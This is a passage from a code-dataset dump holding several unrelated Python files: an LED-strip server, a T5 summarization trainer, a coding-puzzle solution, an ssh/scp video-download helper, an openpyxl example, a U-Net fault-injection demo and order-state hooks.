standard\n        colour hex: #RRGGBB\n        \n        :param hex_str: the hex string to decode.\n        :type hex_str: str\n\n        :return: A list of ints [r, g, b] if correct format. 
An empty list if incorrect\n            format.\n        :rtype: List[]\n        \"\"\"\n\n        try:\n            match = self.colour_hex_decoder.match(hex_str)\n            if not len(match.group(0)) == len(hex_str) == 7:\n                return []\n\n        except:\n            return []\n\n        # The hex string is the correct format, time to decode\n        red = int(hex_str[1:3], 16)\n        gre = int(hex_str[3:5], 16)\n        blu = int(hex_str[5:7], 16)\n\n        return [red, gre, blu]\n\n    async def map(self, x, in_min, in_max, out_min, out_max):\n        return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min\n\n    async def bad_request(self, reader, writer, data_dict):\n\n        await writer.awrite(\"HTTP/1.0 400 BAD REQUEST\\r\\n\")\n\n        await reader.aclose()\n        await writer.aclose()\n\n        await self.post_req_debug_out(data_dict)\n\n\nasync def heartbeat():\n    \"\"\"Flash the onboard LED in a heartbeat to show the event loop is running\"\"\"\n\n    from machine import Pin\n\n    status_led = Pin(2, Pin.OUT)\n\n    status_led.on()\n    await uasyncio.sleep(0.1)\n    status_led.off()\n    await uasyncio.sleep(0.1)\n\n    status_led.on()\n    await uasyncio.sleep(0.1)\n    status_led.off()\n    await uasyncio.sleep(0.1)\n\n    while True:\n        status_led.on()\n        await uasyncio.sleep(0.5)\n        status_led.off()\n        await uasyncio.sleep(0.5)\n\n\ndef main():\n    led_strip_server = LEDStripServer()\n\n    # Set up event loop\n    loop.create_task(led_strip_server.start_server())\n    loop.create_task(heartbeat())\n    loop.run_forever()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"palexander23/rgb-led-strip","sub_path":"uPythonCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28884785422","text":"import os\nimport shutil\n\nimport torch\nimport torch.nn as nn\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.optim import AdamW\nfrom torch.optim.lr_scheduler import (\n    LinearLR,\n    CosineAnnealingLR,\n)\nfrom torch.nn.utils import clip_grad_norm_\nfrom rouge import Rouge\nfrom sacrebleu.metrics import BLEU\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom tqdm import tqdm\nimport math\nimport numpy as np\nimport logging\n\nfrom .data_process import MyDataset\nfrom .utils import get_writer, get_logger\n\nlogger = get_logger('log.txt')\n\nrouge = Rouge()\nbleu = BLEU()\nclass T5ForFewshotGeneration(nn.Module):\n    def __init__(self, args):\n        super(T5ForFewshotGeneration, self).__init__()\n        self.args = args\n        self.tkn = T5Tokenizer.from_pretrained(args.model_name_or_path, model_max_length=args.max_source_length)\n        self.model = T5ForConditionalGeneration.from_pretrained(args.model_name_or_path).cuda()\n\n    def forward(self, input_ids, attention_mask): \n        return self.model(\n            input_ids=input_ids,\n            attention_mask=attention_mask\n        )\n\n    def finetune(self, train_dataset=None, dev_dataset=None, pretrain=True, save_measure=None):\n        args = self.args\n        writer = get_writer(args.logdir)\n        model = self.model\n        tkn = self.tkn\n        \n        summarize_prefix = self.tkn.encode('summarize:', return_tensors='pt', add_special_tokens=False).cuda()\n        expand_prefix = self.tkn.encode('expand:', return_tensors='pt', add_special_tokens=False).cuda()\n\n        num_update_steps_per_epoch = math.ceil(\n            len(train_dataset) / args.gradient_accumulation_steps\n        )\n        if args.max_train_steps > 0:\n            args.num_train_epochs = math.ceil(\n                args.max_train_steps / num_update_steps_per_epoch\n            )\n        else:\n            args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n        total_batch_size = args.train_batch_size * 
args.gradient_accumulation_steps\n\n optimizer = AdamW(\n params=self.parameters(),\n lr=args.learning_rate,\n betas=(0.9, 0.999),\n eps=args.adam_epsilon,\n weight_decay=args.weight_decay,\n amsgrad=False,\n )\n if args.scheduler_type == 'cosine':\n scheduler = CosineAnnealingLR(optimizer, T_max=args.max_train_steps)\n elif args.scheduler_type == 'linear':\n scheduler = LinearLR(optimizer, start_factor=1., end_factor=0.)\n else:\n raise ValueError(\"scheduler_type must be cosine or linear\")\n\n global_steps = 0\n if args.ckp_path is not None:\n self._load(args.ckp_path, optimizer, scheduler)\n pretrain = False\n global_steps = args.init_step\n\n if args.use_amp:\n scaler = GradScaler(init_scale=args.scale_loss)\n \n gen_kwargs_a2b = {\n \"max_length\": args.max_target_length,\n \"length_penalty\": 1.0,\n \"early_stopping\": True,\n }\n gen_kwargs_b2a = {\n \"max_length\": args.max_source_length,\n \"length_penalty\": 0.0,\n \"early_stopping\": True,\n }\n\n self.log(\"********** Running training **********\")\n self.log(f\" Num examples = {len(train_dataset.data)}\")\n self.log(f\" Num Epochs = {args.num_train_epochs}\")\n self.log(f\" Instantaneous train batch size = {args.train_batch_size}\")\n self.log(f\" Instantaneous eval batch size = {args.eval_batch_size}\")\n self.log(f\" Total train batch size (w. accumulation) = {total_batch_size}\")\n self.log(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n self.log(f\" Total optimization steps = {args.max_train_steps}\")\n \n self.gold_batches = train_dataset.get_batches(args.pretrain_steps)\n train_dataset.shuffle(seed=args.seed)\n # temperature = 1.0\n if pretrain:\n self.log(\"********** Pretraining **********\")\n self.train()\n for step, batch in enumerate(self.gold_batches):\n with autocast(args.use_amp):\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = batch\n inputs = self.prefixed_samples(expand_prefix, source_ids, source_mask, source_label)\n loss_idt_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, target_ids, target_mask, target_label)\n loss_idt_b = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, target_label)\n loss_gold_b = model(**inputs)[0]\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, source_label)\n loss_gold_a = model(**inputs)[0]\n\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n fake_tgt_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_a2b,\n )\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, None)\n fake_src_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_b2a,\n )\n inputs = self.prefixed_samples(expand_prefix, fake_tgt_ids, self.gen_mask(fake_tgt_ids), source_label)\n loss_cyc_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, fake_src_ids, self.gen_mask(fake_src_ids), target_label)\n loss_cyc_b = model(**inputs)[0]\n\n loss_gold = loss_gold_a + loss_gold_b\n loss_total = (loss_idt_a + loss_idt_b) * args.lambda_idt + (loss_cyc_a + loss_cyc_b) * args.lambda_cyc\n loss = loss_gold + loss_total\n loss /= args.gradient_accumulation_steps\n\n if args.use_amp:\n scaler.scale(loss).backward()\n else:\n loss.backward()\n \n if (\n (step+1) % args.gradient_accumulation_steps == 0\n or step == len(train_dataset) - 1\n ):\n clip_grad_norm_(self.parameters(), 
args.max_grad_norm)\n if args.use_amp:\n scaler.step(optimizer)\n scaler.update()\n else:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n losses = {\n 'total': loss_total.item(),\n 'gold_a': loss_gold_a.item(),\n 'gold_b': loss_gold_b.item(),\n 'idt_a': loss_idt_a.item(),\n 'idt_b': loss_idt_b.item(),\n 'cyc_a': loss_cyc_a.item(),\n 'cyc_b': loss_cyc_b.item(),\n }\n for k, v in losses.items():\n writer.add_scalar(f\"pretrain/{k}\", v, step//args.gradient_accumulation_steps)\n \n output_dir = os.path.join(args.output_dir, \"pretrain\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n self.log(\"********** Pretraining finished**********\")\n\n progress_bar = tqdm(range(args.max_train_steps))\n\n gold_idx = 0\n last_step = global_steps\n progress_bar.update(last_step)\n found_last = last_step == 0\n \n best_score = 0.\n saves = []\n for _ in range(args.num_train_epochs):\n for step, batch in enumerate(train_dataset):\n if not found_last:\n if step / args.gradient_accumulation_steps < last_step:\n continue\n else:\n found_last = True\n self.train()\n\n with autocast(args.use_amp):\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = batch\n inputs = self.prefixed_samples(expand_prefix, source_ids, source_mask, source_label)\n loss_idt_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, target_ids, target_mask, target_label)\n loss_idt_b = model(**inputs)[0]\n\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n fake_tgt_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_a2b,\n )\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, None)\n fake_src_ids = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs_b2a,\n )\n inputs = self.prefixed_samples(expand_prefix, fake_tgt_ids, self.gen_mask(fake_tgt_ids), source_label)\n loss_cyc_a = model(**inputs)[0]\n inputs = self.prefixed_samples(summarize_prefix, fake_src_ids, self.gen_mask(fake_src_ids), target_label)\n loss_cyc_b = model(**inputs)[0]\n\n loss_total = (loss_idt_a + loss_idt_b) * args.lambda_idt + (loss_cyc_a + loss_cyc_b) * args.lambda_cyc\n loss = loss_total\n\n if (global_steps+1) % args.gold_steps == 0:\n source_ids, source_mask, source_label, target_ids, target_mask, target_label = self.gold_batches[gold_idx]\n gold_idx = (gold_idx + 1) % len(self.gold_batches)\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, target_label)\n loss_gold_b = model(**inputs)[0]\n inputs = self.prefixed_samples(expand_prefix, target_ids, target_mask, source_label)\n loss_gold_a = model(**inputs)[0]\n loss_gold = loss_gold_a + loss_gold_b\n loss += loss_gold\n loss /= args.gradient_accumulation_steps\n\n if args.use_amp:\n scaler.scale(loss).backward()\n else:\n loss.backward()\n\n if (\n (step+1) % args.gradient_accumulation_steps == 0\n or step == len(train_dataset) - 1\n ):\n if args.use_amp:\n scaler.step(optimizer)\n scaler.update()\n else:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n\n progress_bar.update(1)\n global_steps += 1\n writer.add_scalar(\"train/total\", loss_total.item(), global_steps)\n writer.add_scalar(\"train/idt_a\", loss_idt_a.item(), global_steps)\n writer.add_scalar(\"train/idt_b\", loss_idt_b.item(), global_steps)\n writer.add_scalar(\"train/cyc_a\", loss_cyc_a.item(), global_steps)\n writer.add_scalar(\"train/cyc_b\", 
loss_cyc_b.item(), global_steps)\n \n if global_steps % args.gold_steps == 0:\n writer.add_scalar(\"train/gold_a\", loss_gold_a.item(), global_steps)\n writer.add_scalar(\"train/gold_b\", loss_gold_b.item(), global_steps)\n \n if args.logging_steps > 0 and global_steps% args.logging_steps == 0 :\n writer.add_scalar(\"lr\", optimizer.param_groups[0]['lr'], global_steps)\n writer.add_scalar(\"loss\", loss.item(), global_steps)\n self.log(\n \"global_steps {} - lr: {:.10f} loss: {:.8f}\".format(\n global_steps,\n optimizer.param_groups[0]['lr'],\n loss.item(),\n )\n )\n\n if args.save_steps > 0 and global_steps % args.save_steps == 0:\n self.log(\"********** Running evaluating **********\")\n self.log(f\"********** Step {global_steps} **********\")\n output_dir = os.path.join(args.output_dir, f\"step-{global_steps}\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n saves.append(output_dir)\n if len(saves) > args.num_saves_kept:\n shutil.rmtree(saves.pop(0))\n \n eval_results = self.evaluate(dev_dataset, args.num_eval_batch)\n scores = list(eval_results.values())\n if save_measure is None:\n score = np.mean(scores)\n else:\n measures = []\n for i in save_measure:\n measures.append(scores[i])\n score = np.mean(measures)\n \n self.debug(eval_results)\n self._save_metric(output_dir, eval_results)\n \n if score > best_score:\n self.log(f\"********** Saving best result in step {global_steps} **********\")\n best_score = score\n best_dir = os.path.join(args.output_dir, \"best\")\n os.makedirs(best_dir, exist_ok=True)\n self._save(best_dir, optimizer, scheduler)\n self._save_metric(best_dir, eval_results)\n \n for k, v in eval_results.items():\n writer.add_scalar(f\"eval/{k}\", v, global_steps)\n self.log(\"********** Evaluating Done **********\")\n\n if global_steps >= args.max_train_steps:\n self.log(\"********** Running evaluating **********\")\n self.log(f\"********** Step {global_steps} **********\")\n output_dir = os.path.join(args.output_dir, f\"final-step-{global_steps}\")\n os.makedirs(output_dir, exist_ok=True)\n self._save(output_dir, optimizer, scheduler)\n eval_results = self.evaluate(dev_dataset, -1)\n self.debug(eval_results)\n self._save_metric(output_dir, eval_results)\n for k, v in eval_results.items():\n writer.add_scalar(f\"eval/{k}\", v, global_steps)\n self.log(\"********** Evaluating Done **********\")\n self.log(\"********** Training Done **********\")\n return\n\n\n @torch.no_grad()\n def evaluate(self, data_loader=None, num_batch=100, split='validation'):\n if data_loader is None:\n data_loader = MyDataset(self.tkn, self.args.eval_batch_size, split=split)\n \n summarize_prefix = self.tkn.encode('summarize:', return_tensors='pt', add_special_tokens=False).cuda()\n self.eval()\n model = self.model\n tkn = self.tkn\n\n gen_kwargs = {\n \"max_length\": self.args.max_target_length,\n \"num_beams\": self.args.num_beams,\n \"length_penalty\": 1.0,\n \"early_stopping\": True,\n }\n decoded_preds = []\n decoded_labels = [] \n progress_bar = tqdm(range(num_batch if num_batch > 0 else len(data_loader)))\n for i, batch in enumerate(data_loader):\n if num_batch > 0 and i >= num_batch:\n break\n source_ids, source_mask, _, target_ids, _, target_label = batch\n inputs = self.prefixed_samples(summarize_prefix, source_ids, source_mask, None)\n generated_tokens = model.generate(\n inputs=inputs['input_ids'],\n attention_mask=inputs['attention_mask'],\n **gen_kwargs,\n )\n labels = np.where(target_label.cpu().numpy() != -100, 
target_label.cpu().numpy(), tkn.pad_token_id)\n\n            decoded_preds.extend(tkn.batch_decode(generated_tokens.cpu().numpy(), skip_special_tokens=True))\n            decoded_labels.extend(tkn.batch_decode(labels, skip_special_tokens=True))\n            progress_bar.update(1)\n\n        self.debug(decoded_preds[:3])\n        self.debug(decoded_labels[:3])\n        if self.args.is_zh:\n            f = lambda s: ' '.join(s)\n            decoded_preds = list(map(f, decoded_preds))\n            decoded_labels = list(map(f, decoded_labels))\n\n        scores = rouge.get_scores(decoded_preds, decoded_labels, avg=True)\n        for k in scores.keys():\n            scores[k] = scores[k]['f'] * 100\n        scores['bleu'] = bleu.corpus_score(decoded_preds, [decoded_labels]).score\n        # return decoded_preds, decoded_labels\n        return scores\n    \n    @torch.no_grad()\n    def gen_mask(self, ids):\n        mask = torch.zeros_like(ids, dtype=torch.int64)\n        for i in range(ids.shape[0]):\n            for j in range(ids.shape[1]):\n                if ids[i,j] == self.tkn.pad_token_id:\n                    break\n                mask[i,j] = 1\n        return mask\n\n    @torch.no_grad()\n    def prefixed_samples(self, prefix, ids, mask, labels):\n        outputs = {\n            'input_ids': torch.cat(\n                [\n                    prefix.repeat(ids.shape[0], 1), \n                    ids\n                ],\n                dim=-1\n            ).cuda(),\n            'attention_mask': torch.cat(\n                [\n                    torch.ones(ids.shape[0], prefix.shape[-1]).cuda(), \n                    mask\n                ],\n                dim=-1\n            ).cuda(),\n            'labels': labels.cuda() if labels is not None else labels\n        }\n        return outputs\n\n    def _save(self, output_dir, optimizer, scheduler):\n        state = {\n            'model': self.state_dict(), \n            'optimizer': optimizer.state_dict(), \n            'scheduler': scheduler.state_dict()\n        }\n        torch.save(state, os.path.join(output_dir, \"model.pth\"))\n        return\n    \n    def _load(self, ckp_dir, optimizer, scheduler):\n        state = torch.load(os.path.join(ckp_dir, \"model.pth\"))\n        self.load_state_dict(state['model'])\n        optimizer.load_state_dict(state['optimizer'])\n        scheduler.load_state_dict(state['scheduler'])\n        return\n    \n    def _save_metric(self, output_dir, eval_results):\n        with open(os.path.join(output_dir, \"metrics.txt\"), 'w') as f:\n            f.write(str(eval_results))\n        return\n    \n    def debug(self, var):\n        print(var)\n        logger.debug(var)\n\n    def log(self, info):\n        print(info)\n        logger.info(info)","repo_name":"StarsMoon/ATS","sub_path":"pytorch/model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75190282724","text":"# MissingInteger\n# Write a function that, given an array A of N integers, returns the smallest positive integer (greater than 0) that does not occur in A.\n# For example, given A = [1, 3, 6, 4, 1, 2], the function should return 5.\n# Given A = [1, 2, 3], the function should return 4.\n# Given A = [-1, -3], the function should return 
1.\n\ndef solution(A):\n    aLen = len(A)\n    B = [0] * (aLen + 2)\n    bLen = len(B)\n    for i in range(aLen):\n        if A[i] > 0 and A[i] < bLen and B[A[i]] == 0:\n            B[A[i]] = A[i]\n    for i in range(1, bLen):\n        if B[i] == 0:\n            return i\n    return 1\n    \n\n#A = [1, 2, 3]\n#A = [-1, -3]\nA = [1,1,2,3,4,5,99]\nprint(solution(A))","repo_name":"dawidbo/algorithms","sub_path":"Codility/missingInteger.py","file_name":"missingInteger.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31173919022","text":"from typarse import BaseParser\nimport subprocess\n\n\nclass Parser(BaseParser):\n    model_name: str\n    target_dir: str = \"./videos\"\n    name: str = \"video\"\n    use_cached_model: bool = False\n    deterministic: bool = False\n\n    _help = {\n        \"model_name\": \"Name of the model to use\",\n        \"target_dir\": \"Path to the directory where to save the video\",\n        \"name\": \"Name of the video\",\n        \"use_cached_model\": \"Whether to use the cached model or not. Only use if you know it exists\",\n        \"deterministic\": \"Whether to use deterministic action sampling or not\",\n    }\n\n    _abbrev = {\n        \"model_name\": \"m\",\n        \"target_dir\": \"t\",\n        \"name\": \"n\",\n        \"use_cached_model\": \"uc\",\n        \"deterministic\": \"d\",\n    }\n\n\nif __name__ == \"__main__\":\n    args = Parser()\n\n    model_name = args.model_name\n\n    if not args.use_cached_model:\n        print(\"Downloading model on remote\")\n        out1 = subprocess.run(\n            f\"ssh -t ariel.geovic 'scp -r jeanzay:/gpfswork/rech/nbk/utu66tc/tb_logs/{model_name} temp/'\",\n            shell=True,\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n        )\n        print(out1.stdout.decode(\"utf-8\"))\n        print(out1.stderr.decode(\"utf-8\"))\n\n    print(\"Generating video on remote\")\n    out2 = subprocess.run(\n        f\"ssh -t ariel.geovic '/home/ariel/anaconda3/envs/coltra/bin/python /home/ariel/projects/coltra-rl/scripts/enjoy_crowd.py -p /home/ariel/temp/{model_name} -e /home/ariel/projects/coltra-rl/builds/crowd-v6a/crowd.x86_64{' -d' if args.deterministic else ''}'\",\n        shell=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n    )\n    print(out2.stdout.decode(\"utf-8\"))\n    print(out2.stderr.decode(\"utf-8\"))\n\n    print(\"Downloading video on remote\")\n    out3 = subprocess.run(\n        f\"scp -r ariel.geovic:/home/ariel/temp/video.webm {args.target_dir}\",\n        shell=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n    )\n    print(out3.stdout.decode(\"utf-8\"))\n    print(out3.stderr.decode(\"utf-8\"))\n\n    print(\"Converting video to mp4\")\n    out4 = subprocess.run(\n        f\"ffmpeg -y -f webm -i {args.target_dir}/video.webm {args.target_dir}/{args.name}.mp4\",\n        shell=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n    )\n    print(out4.stdout.decode(\"utf-8\"))\n    print(out4.stderr.decode(\"utf-8\"))\n\n    print(\"Cleaning up\")\n    out5 = subprocess.run(\n        f\"rm {args.target_dir}/video.webm\",\n        shell=True,\n        stdout=subprocess.PIPE,\n        stderr=subprocess.PIPE,\n    )\n    print(out5.stdout.decode(\"utf-8\"))\n    print(out5.stderr.decode(\"utf-8\"))\n\n    print(\"Done\")\n","repo_name":"RedTachyon/coltra-rl","sub_path":"scripts/download_video.py","file_name":"download_video.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"11941575635","text":"import openpyxl\n\nwb = openpyxl.load_workbook(r\"D:\\03_demo.xlsx\")  # load a workbook\n\nws1 = wb[\"YorkFish1\"]\nws1.row_dimensions[2].height = 100\nws1.column_dimensions['C'].width = 
50\n\nwb.save(r\"D:\\03_demo.xlsx\")  # save the file; this must be done while the file is not open elsewhere\n\n","repo_name":"YorkFish/learning_notes","sub_path":"Python3/FishC/openpyxl/lesson_03_02.py","file_name":"lesson_03_02.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11776014375","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport tensorflow_datasets as tfds\nfrom keras import backend as K\n\nimport os\nimport sys \n\nCLASSES_MODULE_PATH = \"../../../\"\nWEIGHT_FILE_PATH = \"../\"\n\n# appending a path\nsys.path.append(CLASSES_MODULE_PATH) #CHANGE THIS LINE\n\nfrom src.injection_sites_generator import *\n\n\n### How to target a model with skip connections\n# In this example we will show how to use classes to simulate errors\n# targeting a model with skip connections. We define a small unet\n# model with a single skip connection (function build_tiny_unet) and we will target\n# the first convolution after the skip. To do so we need to find the idx of the layer we\n# want to target by passing through the list model.layers; the index we are looking for is 5.\n# The next step consists in defining all the functions needed to perform the injection correctly,\n# this means that we need to manually provide each connection with all the inputs required.\n# Lines 140 - 144 are where we define the following functions\n# 1. get_selected_layer_output: executes the model from the input layer through the selected layer,\n# produces the output of the target layer\n# 2. get_conv2_output: executes the model from the input layer through the second convolutional layer,\n# the output produced will be the first input of the concatenate layer\n# 3. get_input_concatenate: executes the model from the target layer through the one before the concatenate layer,\n# the input for this function must be the corrupted output of the target layer\n# 4. 
get_final_output: executes the model from the concatenation through the final output.\n#\n# It should be noted that this code doesn't work without some modifications: we currently do not load a real dataset\n# and do not provide an evaluation function for the output, which is strictly dependent on the domain of the model.\n\ndef generate_injection_sites(sites_count, layer_type, layer_name, size, models_path, models_mode=''):\n    \"\"\"\n    models_path: relative path from the pwd to the models folder\n    \"\"\"\n    injection_site = InjectableSite(layer_type, layer_name, size)\n\n    try:\n        injection_sites, cardinality, pattern = InjectionSitesGenerator([injection_site], models_mode, models_path) \\\n            .generate_random_injection_sites(sites_count)\n    except Exception:\n        # return an empty site list (plus empty stats) so the caller's\n        # three-way unpacking still works\n        return [], None, None\n\n    return injection_sites, cardinality, pattern\n\n\ndef double_conv_block(x, n_filters, nameType=None):\n    x = layers.Conv2D(n_filters, 3,\n                      padding=\"same\", activation=\"relu\",\n                      kernel_initializer=\"he_normal\",\n                      name=f'conv1_{nameType}_{n_filters}')(x)\n    x = layers.Conv2D(n_filters, 3,\n                      padding=\"same\", activation=\"relu\",\n                      kernel_initializer=\"he_normal\",\n                      name=f'conv2_{nameType}_{n_filters}')(x)\n\n    return x\n\n\ndef downsample_block(x, n_filters):\n    f = double_conv_block(x, n_filters, nameType='downsample')\n    p = layers.MaxPool2D(2, name=f'maxpool_{n_filters}')(f)\n    p = layers.Dropout(0.3, name=f'dropout_{n_filters}')(p)\n\n    return f, p\n\n\ndef upsample_block(x, conv_features, n_filters):\n    x = layers.Conv2DTranspose(n_filters, 3, 2, padding=\"same\",\n                               name=f'upconv_{n_filters}')(x)\n    x = layers.concatenate([x, conv_features], name=f'concat_{n_filters}')\n    x = layers.Dropout(0.3, name=f'dropout_upsample_{n_filters}')(x)\n    x = double_conv_block(x, n_filters, nameType='upsample')\n\n    return x\n\n\ndef build_tiny_unet(output_channels):\n    inputs = layers.Input(shape=(128, 128, 3), name='input')\n\n    f1, p1 = downsample_block(inputs, 32)\n    bottleneck = double_conv_block(p1, 64, nameType='bottleneck')\n    u1 = upsample_block(bottleneck, f1, 32)\n    outputs = layers.Conv2D(output_channels, 1, padding=\"same\", activation=\"softmax\",\n                            name='output')(u1)\n    unet_model = tf.keras.Model(inputs, outputs, name=\"U-Net\")\n    return unet_model\n\n\ndef load_images():\n    \"\"\"\n    Dummy function; it should load the dataset that the model should use\n    \"\"\"\n    return 0\n\n\ndef evaluate_output(val):\n    \"\"\"\n    Dummy function; it should evaluate the obtained output based on a metric chosen by the developer\n    \"\"\"\n    return 0\n\n\ndef main():\n    path_weights = os.path.join(WEIGHT_FILE_PATH,'weights.h5')\n    print(f\"Load weights from => {path_weights}\")\n    model = keras.models.load_model('../tiny_unet.h5', compile=False)\n\n    img = load_images()\n    selected_layer_idx = 5\n    conv2_idx = 2\n    conv2d_transpose_idx = 7\n    concatenate_idx = 8\n\n    get_selected_layer_output = K.function([model.layers[0].input], [model.layers[selected_layer_idx].output])\n    get_conv2_output = K.function([model.layers[0].input], [model.layers[conv2_idx].output])\n    get_input_concatenate = K.function([model.layers[selected_layer_idx + 1].input],\n                                       [model.layers[conv2d_transpose_idx].output])\n    get_final_output = K.function([model.layers[concatenate_idx].input], [model.layers[-1].output])\n\n    selected_layer_output = get_selected_layer_output(img)\n\n    injection_site, cardinality, pattern = generate_injection_sites(1, OperatorType['Conv2D'], '',\n                                                                    '(None, 64, 64, 64)', models_path='models')\n\n    if len(injection_site) > 0:\n        for idx, value in injection_site[0].get_indexes_values():\n            
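# note: the injection indexes appear to come in channels-first (N, C, H, W) order,\n            # so they are remapped to the channels-last (N, H, W, C) layout of this TF model\n            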
channel_last_idx = (idx[0], idx[2], idx[3], idx[1])\n            if value.value_type == '[-1,1]':\n                selected_layer_output[0][channel_last_idx] += value.raw_value\n            else:\n                selected_layer_output[0][channel_last_idx] = value.raw_value\n\n    conv2_output = get_conv2_output(img)\n    input_concatenate = get_input_concatenate(selected_layer_output)\n    final_output = get_final_output([conv2_output, input_concatenate])\n\n    evaluate_output(final_output)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"D4De/classes","sub_path":"examples/tensorflow2/as_a_function/small_unet.py","file_name":"small_unet.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"3623920872","text":"import locale\nfrom datetime import datetime\n\nfrom .models import Order\n\n\n@Order.State.PROCESSING.register_hook(\"before\")\ndef validate_payment_method(order: Order, payment_method=None, **kwargs):\n    if payment_method not in (\"cash\", \"card\"):\n        raise ValueError(f\"Invalid payment method: {payment_method}\")\n    order.metadata[\"payment_method\"] = payment_method\n\n\n@Order.State.PROCESSING.register_hook(\"before\")\ndef apply_discount(order: Order, discount=None, **kwargs):\n    if discount is None:\n        return\n\n    if not 0 <= discount <= 100:\n        raise ValueError(f\"Invalid discount percentage: {discount}\")\n\n    order.price = order.price * (1 - discount / 100)\n    order.metadata[\"discount\"] = discount\n\n\n@Order.State.PROCESSING.register_hook(\"after\")\ndef notify_payment_success(order: Order, payment_method, **kwargs):\n    print(f\"\\u001b[32mPayment for order #{order.id} successful!\")\n    print(f\"\\u001b[32mTotal: {order.price} (paid with {payment_method})\")\n\n\n@Order.State.OUT_FOR_DELIVERY.register_hook(\"before\")\ndef validate_delivery_date(order: Order, delivery_date=None, **kwargs):\n    if delivery_date is None:\n        raise ValueError(\"Delivery date is required\")\n\n    parsed_date = datetime.fromisoformat(delivery_date)\n    if parsed_date < datetime.now():\n        raise ValueError(\"Delivery date must be in the future\")\n\n    order.metadata[\"delivery_date\"] = delivery_date\n\n\n@Order.State.OUT_FOR_DELIVERY.register_hook(\"after\")\ndef notify_out_for_delivery(order: Order, delivery_date, **kwargs):\n    locale.setlocale(locale.LC_ALL, \"\")\n    parsed_date = datetime.fromisoformat(delivery_date)\n    print(f\"\\u001b[32mOrder #{order.id} is out for delivery!\")\n    print(f\"\\u001b[32mDelivery date: {parsed_date:%c}\")\n\n\n@Order.State.DELIVERED.register_hook(\"after\")\ndef notify_delivery_success(order: Order, **kwargs):\n    print(f\"\\u001b[32mOrder #{order.id} delivered successfully!\")\n\n\n@Order.State.CANCELLED.register_hook(\"after\")\n@Order.State.REFUNDED.register_hook(\"after\")\ndef send_questionnaire(order: Order, **kwargs):\n    print(\"\\u001b[32mWe're sad to see you go! 
